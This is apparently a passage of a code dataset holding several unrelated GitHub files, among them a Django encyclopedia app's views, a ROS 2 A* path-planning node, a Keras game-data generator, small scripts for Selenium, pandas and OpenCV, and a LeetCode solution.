first_line.strip() != ideal_line.strip(): # Check that the content format matches the title.\n raise ValidationError('Error: The first line of this entry should be: # ' + title_data)\n\"\"\"\ndef index(request):\n # Search Bar Function\n query = request.GET.get('q')\n if query != None:\n return HttpResponseRedirect(reverse('search', args=[query]))\n # Search Bar Function\n\n else:\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\ndef entry(request, entry):\n # Search Bar Function\n query = request.GET.get('q')\n if query != None:\n return HttpResponseRedirect(reverse('search', args=[query]))\n # Search Bar Function\n\n if util.get_entry(entry) == None:\n return render(request, \"encyclopedia/entryPage.html\", {\n \"entry\" : entry,\n \"exists\" : False\n })\n return render(request, \"encyclopedia/entryPage.html\", {\n \"entry\" : entry,\n \"exists\" : True,\n \"content\" : markdown2.markdown(util.get_entry(entry))\n })\n\n\ndef search(request, search):\n # Search Bar Function\n query = request.GET.get('q')\n if query != None:\n return HttpResponseRedirect(reverse('search', args=[query]))\n # Search Bar Function\n\n if search in util.list_entries():\n return HttpResponseRedirect(reverse('entry', args=[search]))\n else:\n match_list = []\n for i in util.list_entries():\n if search.lower() in i.lower():\n match_list.append(i)\n return render(request, \"encyclopedia/searchPage.html\", {\n \"list\" : match_list\n })\n\ndef Create_New_Page(request):\n if request.method == \"POST\":\n form = EntryForm(request.POST)\n if form.is_valid(): # Server Side Validation\n form_title = form.cleaned_data['title']\n form_content = form.cleaned_data['content']\n util.save_entry(form_title, form_content) # Make new entry\n return HttpResponseRedirect('wiki/' + form_title)\n else:\n return render(request, \"encyclopedia/createNewPage.html\", {\n \"form\": form\n })\n return render(request, \"encyclopedia/createNewPage.html\", {\n \"form\": EntryForm()\n })\n \ndef edit(request, page):\n if request.method == \"POST\":\n form = EditForm(request.POST)\n if 
form.is_valid(): # Server Side Validation\n form_content = form.cleaned_data['content']\n print('POST = ' + form_content)\n util.save_entry(page, form_content) # Update entry\n return HttpResponseRedirect(reverse('entry', kwargs={'entry':page}))\n else:\n initial_dict = {\n \"title\" : page,\n \"content\" : util.get_entry(page)}\n return render(request, \"encyclopedia/editPage.html\",{\n \"form\" : form,\n \"entry\" : page\n })\n\n initial_dict = {\n \"title\" : page,\n \"content\" : util.get_entry(page)\n }\n print('GET = ' + initial_dict['content'])\n return render(request, \"encyclopedia/editPage.html\", {\n \"form\": EditForm(request.POST or None, initial = initial_dict),\n \"entry\" : page\n })\n\ndef random_page(request):\n pages = util.list_entries()\n random_page = random.choice(pages)\n return HttpResponseRedirect(reverse('entry', args=[random_page]))","repo_name":"Cheez1t/CS50-Project-1","sub_path":"encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3701089246","text":"\nfrom preprocessing import Preprocessing\nfrom verification import Caption\n\n\nif __name__ == '__main__':\n\n out_file_name = \"KEG_UP\" # output folder name\n negative_num = 75 # number of negative (incorrect) images\n stage_num = 30 # number of training stages\n\n def_ng = True # reuse the existing negative images\n finish = False # collect everything into a single folder\n\n pre = Preprocessing( out_file_name, def_ng=def_ng, finish=finish )\n pre.main( neg_num=negative_num, stage_num=stage_num )\n\n Caption( pre.abs_path + pre.out_name )\n","repo_name":"IceSeeds/myCascade","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1786987464","text":"import bz2\nimport pathlib\n\nimport dill as pickle\nimport pandas as pd\n\n\nif __name__ == '__main__':\n \"\"\"\n This script builds a dataframe summarizing the relevant events\n The dataframe is pickled, so it can later be used to loop through the relevant events\n \n If you only want to process a sub-set of the events in the database, use a flag\n \"\"\"\n\n file_name = \"event_summary\"\n\n column_names = [\"SD_station\", # 3 char radar identifier e.g. \"rkn\"\n \"RISR_station\", # 3 char radar identifier e.g. 
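# The event-summary script being set up here fills its dataframe with repeated
# df.append(...) calls (seen just below); DataFrame.append was deprecated in
# pandas 1.4 and removed in 2.0. A hedged sketch of the usual list-of-dicts
# replacement, with the column set shortened for illustration:
import pandas as pd

rows = [
    {'SD_station': 'rkn', 'year': 2011, 'month': 11, 'day': 11},
    {'SD_station': 'rkn', 'year': 2011, 'month': 11, 'day': 12},
]
df = pd.DataFrame(rows, columns=['SD_station', 'year', 'month', 'day'])
print(df)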
\"ran\" # Note: RISR-N = \"ran\"\n \"year\",\n \"month\",\n \"day\",\n \"start_hour_UT\", # int\n \"end_hour_UT\", # int\n\n # flags\n \"for_vel_hist\"\n ]\n df = pd.DataFrame(columns=column_names)\n\n \"\"\" # Insert events below # \"\"\"\n\n # Notes:\n df = df.append({'SD_station': \"rkn\",\n 'RISR_station': \"ran\",\n 'year': 2011,\n 'month': 11,\n 'day': 11,\n 'start_hour_UT': 16,\n 'end_hour_UT': 22,\n\n 'for_vel_hist': 1,\n }, ignore_index=True)\n\n # Notes:\n df = df.append({'SD_station': \"rkn\",\n 'RISR_station': \"ran\",\n 'year': 2011,\n 'month': 11,\n 'day': 12,\n 'start_hour_UT': 18,\n 'end_hour_UT': 21,\n\n 'for_vel_hist': 1\n }, ignore_index=True)\n\n # Notes:\n df = df.append({'SD_station': \"rkn\",\n 'RISR_station': \"ran\",\n 'year': 2011,\n 'month': 11,\n 'day': 14,\n 'start_hour_UT': 17,\n 'end_hour_UT': 21,\n\n 'for_vel_hist': 1\n }, ignore_index=True)\n\n # Notes:\n df = df.append({'SD_station': \"rkn\",\n 'RISR_station': \"ran\",\n 'year': 2012,\n 'month': 10,\n 'day': 15,\n 'start_hour_UT': 18,\n 'end_hour_UT': 20,\n\n 'for_vel_hist': 0\n }, ignore_index=True)\n\n\n # Save the dataframe to file\n loc_root = str(pathlib.Path().absolute())\n out_dir = loc_root + \"/data\"\n out_file = out_dir + \"/\" + file_name + \".pbz2\"\n print(\"Saving event summary as \" + out_file)\n with bz2.BZ2File(out_file, \"w\") as file:\n pickle.dump(df, file)\n\n","repo_name":"mrl280/Summer2021PythonWork","sub_path":"DataAnalysis/OneAndOneHalfHop/build_event_summary.py","file_name":"build_event_summary.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16128595880","text":"from selenium import webdriver\r\nfrom time import sleep\r\n\r\ndef getscreenshot():\r\n driver = webdriver.Firefox(executable_path=r'C:\\Users\\sabri\\Downloads\\geckodriver-v0.31.0-win64\\geckodriver.exe')\r\n driver.get('https://tan-janeczka-31.tiiny.site/')\r\n sleep(1)\r\n\r\n driver.get_screenshot_as_file(\"screenshot.png\")\r\n driver.quit()\r\n print(\"end...\")\r\n\r\ngetscreenshot()","repo_name":"kwakaflocka/getclocks","sub_path":"websitetopng.py","file_name":"websitetopng.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17777512073","text":"import numpy as np\n\n# Library packages needed\nfrom math import sqrt\nimport threading\nimport time\nfrom collections import deque\n\n# ROS API\nimport rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile, QoSHistoryPolicy, QoSReliabilityPolicy, \\\n QoSDurabilityPolicy\nfrom geometry_msgs.msg import Pose2D, PoseStamped, Quaternion\nfrom nav_msgs.msg import OccupancyGrid, Odometry, Path\nfrom sensor_msgs.msg import Image\nimport message_filters\n\n# Our utility functions\nimport ar_py_utils.utils as utils\nfrom ar_py_utils.LocalFrameWorldFrameTransformations import Point2D\nfrom tw06.Graph import Graph, MapPoint, SearchMethods\nfrom tw06.Graph import Node as GraphNode\n\n# Wether to use odometry (if True) or the localization pose (if False).\n# The \"USE_ODOM = True\" should be used only for initial tests, while you are\n# not running the localization algorithm.\nUSE_ODOM = True\n\n# If true, show/publish debug information\nDEBUG = True\n\n\nclass SearchAndPlanning(Node):\n '''\n Path generation using breadth-first, depth-first and A* search algorithms.\n It the path given a goal pose and the current robot pose.\n '''\n def __init__(self):\n '''\n 
Initializes the class instance.\n '''\n # Prevent simultaneous read/write to the class variables\n self.lock = threading.Lock()\n\n # Will hold the graph for the path search\n self.graph = None\n\n # Robot name(space)\n self.robot_name = 'robot_0'\n\n # Initialize the node itself\n super().__init__('search_and_planning')\n\n # Setup subscribers\n # Map\n # Since the map is only published when the map server starts, we need\n # to get the message that was last pubslihed, even if it as published\n # before we subscribed the topic. To enable that behavior so, we\n # specify the TRANSIENT_LOCAL Durability Policy.\n qos_profile = QoSProfile(\n history=QoSHistoryPolicy.KEEP_LAST, depth=1,\n reliability=QoSReliabilityPolicy.RELIABLE,\n durability=QoSDurabilityPolicy.TRANSIENT_LOCAL)\n self.sub_map = self.create_subscription(OccupancyGrid, '/map',\n self.map_cb, qos_profile)\n\n # Setup subscribers using a ApproximateTimeSynchronizer filter. We want\n # to get the estimated robot pose which is closest in time from the\n # published goal pose.\n # Setup odometry or pose subscriber, according to USE_ODOM\n if USE_ODOM: # Use odometry\n # Use odometry should be only until localization is fully working\n self.sub_pose = message_filters.Subscriber(\n self, Odometry, f'/{self.robot_name}/odom')\n else:\n # Estimated pose (from localization)\n self.sub_pose = message_filters.Subscriber(\n self, PoseStamped, f'{self.robot_name}/pose')\n # Goal pose\n self.sub_goal_pose = message_filters.Subscriber(\n self, PoseStamped, f'{self.robot_name}/goal_pose')\n # Joint callback\n ts = message_filters.ApproximateTimeSynchronizer(\n [self.sub_pose, self.sub_goal_pose], 5, 0.5)\n ts.registerCallback(self.goal_pose_cb)\n\n # Setup publishers\n if DEBUG:\n # We will use this \"color image\" for debuggning purposes\n self.dbg_img = None\n # Debug image showing the generated cells\n self.dbg_img_pub = self.create_publisher(\n Image, f'/{self.robot_name}/dbg_search', qos_profile)\n\n # Path publisher\n self.path_pub = self.create_publisher(Path,\n f'/{self.robot_name}/path', 1)\n\n @staticmethod\n def heuristic(current_position: MapPoint,\n goal_position: MapPoint) -> float:\n '''\n Compute the heuristic given the current position and the goal position.\n Returns the heuristic value.\n '''\n # Use Euclidean distance\n return sqrt((goal_position.x-current_position.x)**2 +\n (goal_position.y-current_position.y)**2)\n\n def map_cb(self, msg: OccupancyGrid):\n '''\n Receive an Occupancygrid type message with the map and store an\n internal copy of it.\n '''\n\n # Avoid simultaneous access to the graph\n with self.lock:\n # Store map information internally\n self.map_origin = msg.info.origin\n self.map_resolution = msg.info.resolution\n self.occgrid = np.reshape(np.asanyarray(msg.data),\n (msg.info.height, msg.info.width))\n # Create/initialize graph with occupancy grid.\n # The debug mode must be set to true to enable publishing the graph\n # image view for debugging purposes.\n self.graph = Graph(self.occgrid, debug_mode=DEBUG)\n if DEBUG:\n # Publish initial map/graph image view.\n self.graph.showGraph(self.dbg_img_pub,\n self.get_clock().now().to_msg(),\n 'map')\n self.get_logger().info('Got and stored local copy of the map')\n\n def goal_pose_cb(self, msg_curr_pose, # PoseStamped or Odometry\n msg_goal_pose: PoseStamped):\n '''\n Given a the robot current and target/goal poses, compute the path from\n the starting pose to the goal pose. 
We are only considering positions.\n '''\n\n # Do not continue if the repulsive potential was not yet\n # computed\n with self.lock:\n if self.graph is None:\n self.get_logger().warn(\n 'Got goal pose, but the map was not received yet!')\n return\n\n # Avoid simultaneous access to the map while searching\n self.lock.acquire()\n\n if USE_ODOM: # Get robot pose from the odometry message\n robot_pose = Pose2D(\n x=msg_curr_pose.pose.pose.position.x,\n y=msg_curr_pose.pose.pose.position.y,\n theta=utils.quaternionToYaw(\n msg_curr_pose.pose.pose.orientation))\n else: # Get the robot pose from the PoseStamped message\n robot_pose = Pose2D(\n x=msg_curr_pose.pose.position.x,\n y=msg_curr_pose.pose.position.y,\n theta=utils.quaternionToYaw(msg_curr_pose.pose.orientation))\n\n # Convert start and end poses to map positions (cell coordinates)\n start_position_px = utils.meter2cell(Point2D(x=robot_pose.x,\n y=robot_pose.y),\n self.map_origin,\n self.map_resolution)\n start_pt = MapPoint(start_position_px.x, start_position_px.y)\n goal_position_px = utils.meter2cell(\n Point2D(x=msg_goal_pose.pose.position.x,\n y=msg_goal_pose.pose.position.y),\n self.map_origin,\n self.map_resolution)\n goal_pt = MapPoint(goal_position_px.x, goal_position_px.y)\n\n # Perform the map search and, if successful, and DEBUG is active, show\n # the resulting path in the terminal output as text\n path = self.doSearch(start_pt, goal_pt, SearchMethods.A_STAR)\n if path is not None:\n # Show the last graph image view\n if DEBUG:\n self.get_logger().debug('Showing final searched map')\n self.graph.showGraph(self.dbg_img_pub,\n self.get_clock().now().to_msg(),\n 'map')\n time.sleep(2.0)\n self.get_logger().debug('Showing final path')\n self.graph.showPath(path, self.get_logger(), self.dbg_img_pub,\n self.get_clock().now().to_msg(), 'map')\n # Create the path message to be published\n path_to_publish = Path()\n path_to_publish.header.stamp = self.get_clock().now().to_msg()\n path_to_publish.header.frame_id = 'map' # TODO: use a parameter\n for node in path:\n # Convert from map coordinates to world coordinates\n curr_target = utils.cell2meter(Point2D(node.x, node.y),\n self.map_origin,\n self.map_resolution)\n # Add current target to the path\n pose = PoseStamped()\n pose.header.stamp = path_to_publish.header.stamp\n pose.header.frame_id = path_to_publish.header.frame_id\n # Store position\n pose.pose.position.x = curr_target.x\n pose.pose.position.y = curr_target.y\n pose.pose.position.z = 0.0\n # Store orientation\n pose.pose.orientation = Quaternion(x=0., y=0., z=0., w=1.0)\n # Add to the path\n path_to_publish.poses.append(pose)\n\n # Publish the path\n self.path_pub.publish(path_to_publish)\n\n else:\n self.get_logger().warn(\n 'There is no solution for the specified problem!')\n\n # We are done, reset the graph\n self.graph = Graph(self.occgrid, debug_mode=DEBUG)\n\n # Release lock, since we no longer need access to the shared data\n self.lock.release()\n\n def doSearch(self, start_position: MapPoint, goal_position: MapPoint,\n search_type: SearchMethods) -> bool:\n '''Perform search on a graph.\n Returns true if the solution was found.'''\n\n # Set the graph goal position\n self.graph.setGoalPosition(goal_position)\n\n # Create root node at the given start position and add it to the graph\n # map_graph - graph this node belongs to\n # None - no parent\n # 0 - no cost\n # heuristic function\n # start_position\n # None - no action needed to reach this node\n root = GraphNode(self.graph, None, 0, self.heuristic,\n 
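# goal_pose_cb above converts between world coordinates (meters) and occupancy
# grid cells via utils.meter2cell / cell2meter from ar_py_utils; their exact
# signatures are assumed here. A stand-alone sketch of the standard conversion:
# cell = (world - origin) / resolution, and cell centers on the way back.
def meter2cell_sketch(x, y, origin_x, origin_y, resolution):
    col = int((x - origin_x) / resolution)
    row = int((y - origin_y) / resolution)
    return col, row

def cell2meter_sketch(col, row, origin_x, origin_y, resolution):
    # Return the center of the cell, not its lower-left corner.
    x = origin_x + (col + 0.5) * resolution
    y = origin_y + (row + 0.5) * resolution
    return x, y

print(meter2cell_sketch(1.0, 2.0, -5.0, -5.0, 0.05))  # (120, 140)
print(cell2meter_sketch(120, 140, -5.0, -5.0, 0.05))  # (1.025, 2.025)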
start_position, None)\n self.graph.addNode(root, True)\n\n # This variable will get true if we find a solution, i.e., a path from\n # the start position to the goal\n solutionFound = False\n\n # Output debug line\n self.get_logger().info(\n ' ----> Performing path-planning search in a grid-based map:')\n\n # List of nodes which were already generated but not yet explored.\n nodesToExplore = deque()\n\n # Add the root node to the nodes that were already generated, but not\n # yet explored. This will be the first to expanded.\n nodesToExplore.append(root)\n\n # Keep expanding nodes until we found a solution (a path from start\n # position to the goal position), or until there are no more nodes to\n # explore.\n while (len(nodesToExplore) > 0):\n # Get the first node on the list of nodes to be explored (the node\n # is also removed from the list of nodes to be explored)\n node = nodesToExplore.popleft()\n\n # Check if the current node is the solution, that is, if its\n # position corresponds to the goal position. If so, the search ends\n # now.\n if ((node.map_position_.x == goal_position.x) and\n (node.map_position_.y == goal_position.y)):\n # We found the solution, leave...\n solutionFound = True\n break\n\n # Expand node by generating all its children, stored in the\n # newNodes variable.\n newNodes = node.expand()\n\n # Add the new nodes to the list of nodes that were already\n # generated but not yet explored.\n if (search_type == SearchMethods.DEPTH_FIRST):\n ###############################################################\n # Put code here to update nodesToExplore (Depth-first search)\n ###############################################################\n pass # REPLACE ME\n\n ###############################################################\n elif (search_type == SearchMethods.BREADTH_FIRST):\n ###############################################################\n # Put code here to update nodesToExplore (Breadth-first search)\n ###############################################################\n pass # REPLACE ME\n\n ###############################################################\n elif (search_type == SearchMethods.A_STAR):\n # Add the nodes such that the ones with lowest total cost are\n # in the beggining.\n for new_node in newNodes:\n # Look for the node with higher total cost than this one,\n # and insert the new node before that node.\n # This could be done in a more efficient way!\n i = 0\n while i < len(nodesToExplore):\n if (nodesToExplore[i].total_cost_ >\n new_node.total_cost_):\n break\n else:\n i += 1\n nodesToExplore.insert(i, new_node)\n\n # Show map with search information debugging purposes\n if DEBUG:\n self.graph.showGraph(self.dbg_img_pub,\n self.get_clock().now().to_msg(),\n 'map')\n\n # If a solution was found, return the corresponding path, else, return\n # None.\n if solutionFound:\n finalPath = deque()\n # Get goal node\n node = self.graph.nodes_list_[goal_position.label]\n # Cycle through all available nodes starting from the goal to the\n # start node.\n while (True):\n finalPath.appendleft(node.map_position_)\n # get this node parent\n node = node.parent_\n # If this new node is our start position, i.e., it is our root,\n # we are finished\n if (node == self.graph.root_):\n finalPath.appendleft(node.map_position_)\n break\n return finalPath\n else:\n return None\n\n\ndef main(args=None):\n '''\n Main function.\n '''\n\n # Output usage information\n print('Search and Planning-based path generation\\n' +\n '--------------------------------------\\n')\n\n # Initiate python 
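# The A_STAR branch above keeps nodesToExplore ordered by linear insertion and
# even flags it as inefficient; a heapq-based frontier is the usual fix. A
# hedged, self-contained sketch: entries are (total_cost, counter, payload)
# tuples, where the counter breaks ties so payloads never need to be comparable.
import heapq
import itertools

frontier = []
counter = itertools.count()

def push(total_cost, payload):
    heapq.heappush(frontier, (total_cost, next(counter), payload))

def pop():
    # Payload of the cheapest entry; O(log n) instead of a linear scan.
    return heapq.heappop(frontier)[2]

push(5.0, 'b'); push(2.0, 'a'); push(9.0, 'c')
print(pop(), pop(), pop())  # a b c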
ROS Python control\n rclpy.init(args=args)\n\n # Create our navigation node\n node = SearchAndPlanning()\n\n # Get the node executing\n rclpy.spin(node)\n\n # Cleanup memory and shutdown\n node.destroy_node()\n rclpy.shutdown()\n\n\n'''\nThis is what is actually called when we run this python script. It then calls\nthe main function defined above.\n'''\nif __name__ == '__main__':\n main()\n print('Quitting...')\n","repo_name":"ipleiria-robotics/adv_robotics","sub_path":"src/tw06/tw06/search_and_planning.py","file_name":"search_and_planning.py","file_ext":"py","file_size_in_byte":15211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17281419581","text":"class Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n '''\n :\\1. Algo. 1, BF with accumulated sum array, \n : TC: O(n^2), 201 / 209 test cases passed, Status: Time Limit Exceeded\n : SC: O(1) except nums, \n '''\n \n n = len(nums)\n max_res = -10**5\n \n for i in range(1, n):\n nums[i] += nums[i-1]\n nums = [0] + nums\n \n for i in range(n):\n for j in range(i+1, n+1):\n s = nums[j] - nums[i]\n if s > max_res:\n max_res = s\n \n return max_res\n \n \n# need to check out other algorithm solutions. \n","repo_name":"loganchen39/Leetcode_2022","sub_path":"src/Easy/0053.E.MaximumSubarray.py","file_name":"0053.E.MaximumSubarray.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7151301915","text":"import glob\nimport random\nimport tensorflow as tf\nimport numpy as np\nimport struct\n\nNUM_PLANES = 49\nIMG_SIZE = 5\nNUM_MOVES = 180\nSTATE = \"30s5sB10s10sIIBBBBb720sb\"\n\nclass Generator(tf.keras.utils.Sequence):\n def __init__(self, inputdir, shuffle, batchsize):\n self.record_struct = struct.Struct(STATE)\n self.shuffle = shuffle\n self.batch_size = batchsize\n self.records = []\n\n # load all games into memory (~56K per game) and store them per record\n # for optimal shuffling.\n filenames = glob.glob(str(inputdir) + \"/*.bin\")\n recordsize = self.record_struct.size\n for name in filenames:\n with open(name, \"rb\") as f:\n data = f.read()\n n = len(data)\n assert n % recordsize == 0\n for i in range(0, n, recordsize):\n self.records.append(data[i:i+recordsize])\n print(f\"Loaded {len(self.records)} records shuffle:{shuffle}\")\n\n\n def __iter__(self):\n if self.shuffle:\n random.shuffle(self.records)\n return self\n\n\n def __len__(self):\n return len(self.records) // self.batch_size\n\n\n def __getitem__(self, index):\n x, y = [], ([], [])\n for i in range(self.batch_size):\n s, p, z = self._create_planes(self.records[index * self.batch_size + i])\n x.append(s)\n y[0].append(p)\n y[1].append(z)\n return np.transpose(np.array(x), [0, 2, 3, 1]), (np.array(y[0]), np.array(y[1]))\n\n\n def on_epoch_end(self):\n if self.shuffle:\n random.shuffle(self.records)\n\n\n def _create_planes(self, data):\n \"\"\"\n 1 + 1 + 5 + 5*4 + 15 + 1 + 1 + 1 + 1 + 1 + 1 + 1 = 49\n | | | | | | | | | | | |\n | | | | | | | | | | | them floor: v in {0,...,7}\n | | | | | | | | | | them wall: v in {0, 1}\n | | | | | | | | | them left: v in {0,...,5}\n | | | | | | | | us floor: v in {0,...,7}\n | | | | | | | us wall: v in {0, 1}\n | | | | | | us left: v in {0,...,5}\n | | | | | 1st tile: v in {-1, 0, 1}\n | | | | center: v in {0,...,5}\n | | | factories: v in {0,...,5}\n | | bag: v in {0,...,20}\n | them score: v in {0,...,255}\n us score: v in {0,...,255}\n\n All planes are normalized between 
[0, 1]\n \"\"\"\n c, b, t, l1, l2, w1, w2, f1, f2, s1, s2, f, probs, winner = self.record_struct.unpack(data)\n\n # make sure that the player who's turn it is, is always player 1. This\n # ensures we create the planes from the current player's perspective.\n if t == 1:\n l1, l2 = l2, l1\n w1, w2 = w2, w1\n f1, f2 = f2, f1\n s1, s2 = s2, s1\n\n # create buffer\n planes = np.zeros((NUM_PLANES, IMG_SIZE, IMG_SIZE), dtype=np.float32)\n\n # scores\n index = 0\n planes[index, :, :] = s1 / 255\n index += 1\n planes[index, :, :] = s2 / 255\n index += 1\n\n # bag\n for i in range(5):\n planes[index, :, :] = b[i] / 20\n index += 1\n\n # factories\n for i in range(5):\n tiles = struct.unpack(\"BBBBB\", c[i*5:i*5+5])\n empty = 4\n for tile, n in enumerate(tiles):\n for _ in range(n):\n planes[index, :, :] = (tile + 1) / 5\n empty -= 1\n index += 1\n for _ in range(empty):\n index += 1\n\n # center\n tiles = struct.unpack(\"BBBBB\", c[25:])\n empty = 15\n for tile, n in enumerate(tiles):\n for _ in range(n):\n planes[index, :, :] = (tile + 1) / 5\n empty -= 1\n index += 1\n for _ in range(empty):\n index += 1\n\n # first tile\n planes[index, :, :] = (f + 1) / 2\n index += 1\n\n # p1 left\n for i in range(5):\n tile, n = struct.unpack(\"BB\", l1[i*2:i*2+2])\n for j in range(n):\n planes[index, i, j] = (tile + 1) / 5\n index += 1\n\n # p1 wall\n for i in range(5):\n for j in range(5):\n n = 24 - (i * IMG_SIZE + j)\n planes[index, i, j] = (w1 >> n) & 1\n index += 1\n\n # p1 floor\n planes[index, :, :] = f1 / 7\n index += 1\n\n # p2 left\n for i in range(5):\n tile, n = struct.unpack(\"BB\", l2[i*2:i*2+2])\n for j in range(n):\n planes[index, i, j] = (tile + 1) / 5\n index += 1\n\n # p2 wall\n for i in range(5):\n for j in range(5):\n n = 24 - (i * IMG_SIZE + j)\n planes[index, i, j] = (w2 >> n) & 1\n index += 1\n\n # p2 floor\n planes[index, :, :] = f2 / 7\n index += 1\n\n assert index == NUM_PLANES\n\n return planes, np.frombuffer(probs, dtype=np.float32), np.float32(winner)\n","repo_name":"Error323/a0a","sub_path":"training/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42779604091","text":"import random\n\nclass Kitten:\n\n def __init__(self, name):\n self.name = name\n self.happiness = 20\n self.satiety = 0\n self.age = 1\n self.alive = True\n self.kitten = True\n self.cat = False\n\n def to_chill(self):\n print(\"Time to chill\")\n self.happiness += 3\n self.age += 0.5\n self.satiety -= 0.1\n\n def to_eat(self):\n print(\"Time to eat\")\n self.happiness += 5\n self.age += 0.5\n self.satiety += 2\n\n def to_play(self):\n print(\"Time to play\")\n self.happiness += 2\n self.age += 0.5\n self.satiety -= 1\n\n def to_sleep(self):\n print(\"Time to sleep\")\n self.happiness += 2\n self.age += 0.5\n self.satiety -= 0.2\n\n def to_run(self):\n print(\"Time to run\")\n self.happiness -= 1\n self.age += 0.5\n self.satiety -= 3\n\n def is_kitten(self):\n if self.satiety < -0.2:\n print(\"Give me some milk...\")\n self.kitten = False\n self.cat = False\n elif self.happiness <= 3:\n print(\"Need a new family...\")\n self.kitten = False\n self.cat = False\n elif self.age > 2:\n print(\"Become a cat...\")\n self.kitten = False\n self.cat = True\n\n def end_of_day(self):\n print(f\"happiness = {self.happiness}\")\n print(f\"satiety = {self.satiety}\")\n print(f\"age = {self.age}\")\n\n def live(self, day):\n day = \"Day\" + str(day) + \"Of\" + self.name + \"Life\"\n 
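# The _create_planes routine above decodes fixed-width binary records with the
# struct module (format string STATE). A minimal round-trip sketch of that
# idiom; the toy format and field names below are illustrative, not the actual
# a0a record layout.
import struct

fmt = struct.Struct('5sBI')          # 5 raw bytes, unsigned char, unsigned int
packed = fmt.pack(b'tiles', 7, 1234)
name, count, score = fmt.unpack(packed)
print(name, count, score, fmt.size)  # b'tiles' 7 1234 12 (native alignment pads)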
print(f\"{day:=^50}\")\n live_cube = random.randint(1, 5)\n if live_cube == 1:\n self.to_chill()\n elif live_cube == 2:\n self.to_eat()\n elif live_cube == 3:\n self.to_play()\n elif live_cube == 4:\n self.to_sleep()\n elif live_cube == 5:\n self.to_run()\n self.end_of_day()\n self.is_kitten()\n\nmasya = Kitten(name=\"Masya\")\n\nfor day in range(365):\n if masya.alive == False:\n break\n masya.live(day)\n\n","repo_name":"Nyuta14/lesson_1","sub_path":"homework_2/2_2.py","file_name":"2_2.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8465515027","text":"import json\nimport sys\nimport os\n\n################################################################################\n\n#Temporary Class to put raw data from json to python object\nclass ObjStruct():\n def __init__(self, **entry):\n self.__dict__.update(entry)\n\n\n#Class to make the json nodes usuable node objects\nclass BasicNode(object):\n\n def __init__(self, Node_id, x_cord, y_cord, connected_nodes):\n self.Node_id = Node_id\n self.x_cord = x_cord\n self.y_cord = y_cord\n self.connected_nodes = connected_nodes\n self.end_node = False\n self.distance_from_start = sys.maxsize\n\n def update_end_node(self, update_end_node):\n self.end_node = update_end_node\n\n\n#Class to put the parsed data that can be used in the algorithm\nclass DANode(object):\n\n def __init__(self, Node_id):\n self.Node_id = Node_id\n self.connected_nodes = []\n self.distance_from_start = sys.maxint\n\n def add_connected(self, connected, weight):\n self.connected_nodes[connected] = weight\n\n################################################################################\n\n\nif __name__ == \"__main__\":\n\n #setup of some variables\n nodesArray = []\n\n os.system('CLS')\n print(\"###########################################\\n\")\n filename = input(\"Name of the json file with objects you would like converted: \")\n try:\n\n #Receiving the data\n with open(filename, \"r\") as file:\n #Loading data from json file\n raw_data = json.load(file)\n\n #turning the json object into a usable python dictionary\n NodesObject = ObjStruct(**raw_data)\n\n total_BasicNodes_var = len(NodesObject.Nodes)\n\n #putting the nodes into the unvisited array\n for i in range(total_BasicNodes_var):\n temperary_dict = ObjStruct(**NodesObject.Nodes[i])\n temp_node = BasicNode(temperary_dict.Node_id, temperary_dict.x_cord, temperary_dict.y_cord, temperary_dict.connected_nodes)\n nodesArray.append(temp_node)\n\n except FileNotFoundError:\n print(\"File not found, try again. Reminder the name is caps sensitive.\")\n\n################################################################################\n\n os.system('CLS')\n print(\"###########################################\\n\")\n print(\"Now you can search for any info about any of the nodes in this list.\")\n #Nodes databased\n DNodes_ids = []\n #String to print the nodes\n PNodes_ids = \"\"\n for i in range(len(nodesArray)):\n DNodes_ids.append(nodesArray[i].Node_id)\n PNodes_ids += str(nodesArray[i].Node_id) + \" | \"\n print(\"- The IDs of the Nodes in the file are: \" + PNodes_ids)\n print(\"- You can then find out the different properties of each using any of the commands below\")\n\n print(\"- The commands that can be used are, coordinates (x,y), and connected (nodes). 
After typing these commands\\n- you will be prompted with which node to search\\n- REMEMBER THESE COMMANDS ARE CASE SENSITIVE!!!\\n\")\n print(\"###########################################\\n\")\n\n x = input(\"\")\n x = x.split(\" \")\n while x[0] != \"exit program\":\n if x[1] == \"coordinates\":\n l = DNodes_ids.index(int(x[0]))\n print(str(nodesArray[l].x_cord) + \", \" + str(nodesArray[l].y_cord))\n\n elif x[1] == \"connected\":\n l = DNodes_ids.index(int(x[0]))\n print(str(nodesArray[l].connected_nodes))\n\n else:\n print(\"That command was not recognised, if you do not rememeber the commands they are above.\")\n\n x = input()\n x = x.split(\" \")\n\n\n################################################################################\n","repo_name":"BlakeChiera/SearchingJsonNodes","sub_path":"SearchJsonNodesCode.py","file_name":"SearchJsonNodesCode.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75432718590","text":"import cv2 as cv\nimport os\n\ndef load_images_from_folder(folder):\n\n images = []\n for filename in os.listdir(folder):\n img = cv.imread(os.path.join(folder,filename))\n if img is not None:\n #print(\"image!\")\n images.append(img)\n return images\n \n\ndef folderFind(rootdir, index, subindex):\n\n images = []\n\n for dirs in os.listdir(rootdir):\n \n if index == 0:\n \n subdirs = os.path.join(rootdir, dirs)\n \n images = load_images_from_folder(subdirs + \"/MID\" + str(subindex))\n \n index = index - 1\n 